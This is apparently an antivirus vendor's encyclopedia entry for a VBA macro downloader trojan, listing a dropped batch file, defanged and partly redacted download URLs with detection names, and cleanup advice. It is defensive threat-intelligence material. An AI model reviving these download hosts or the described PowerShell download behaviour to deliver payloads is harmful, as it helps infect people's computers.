Threat Encyclopedia

VBA/Agent.32DC!tr.dldr

Analysis



VBA/Agent.32DC!tr.dldr is a generic detection for a type of macro downloader trojan that downloads other malware onto the compromised computer. Since this is a generic detection, files that are detected as VBA/Agent.32DC!tr.dldr may have varying behavior.
Below are examples of some of these behavior:

  • This malware may drop any of the following file(s):
    • %AppData%\Local\Temp\{Random}.bat: This file is likely to be detected as PowerShell/Agent.C1546!tr.dldr..

  • This malware issues a powershell command line that downloads from a remote site listed below, then drops it on the hosts, usually located in %AppData%\. However, most downloading files are already removed at the time during analysis.
    • hxxp://srient{Removed}.net/lop.bin. The file is likely to be detected as W32/Mansabo.BHL!tr
    • hxxp://nl{Removed}.biz/lop.bin. The file is likely to be detected as W32/Mansabo.BHL!tr
    • hxxp://electrofluxequipment{Removed}.com/pl.bin. The file is likely to be detected as W32/Malicious_Behavior.VEX
    • hxxp://golora{Removed}.com/pl.bin. The file is likely to be detected as W32/Malicious_Behavior.VEX
    • hxxp://nrrgar{Removed}.com/saryacan.bin. The file is likely to be detected as W32/GenKryptik.CDXE!tr
    • hxxp://oasis-{Removed}.com/saryacan.bin. The file is likely to be detected as W32/GenKryptik.CDXE!tr
    • hxxp://mean{Removed}.com/bri.ri. The file is likely to be detected as W32/GenKryptik.CEHY!tr
    • hxxp://25kstart{Removed}.com/
    • hxxp://www.winandgo{Removed}.com/

  • Below are sample illustrations of infected document:

    • Figure 1: Infected Document.



Recommended Action

  • Make sure that your FortiGate/FortiClient system is using the latest AV database.
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.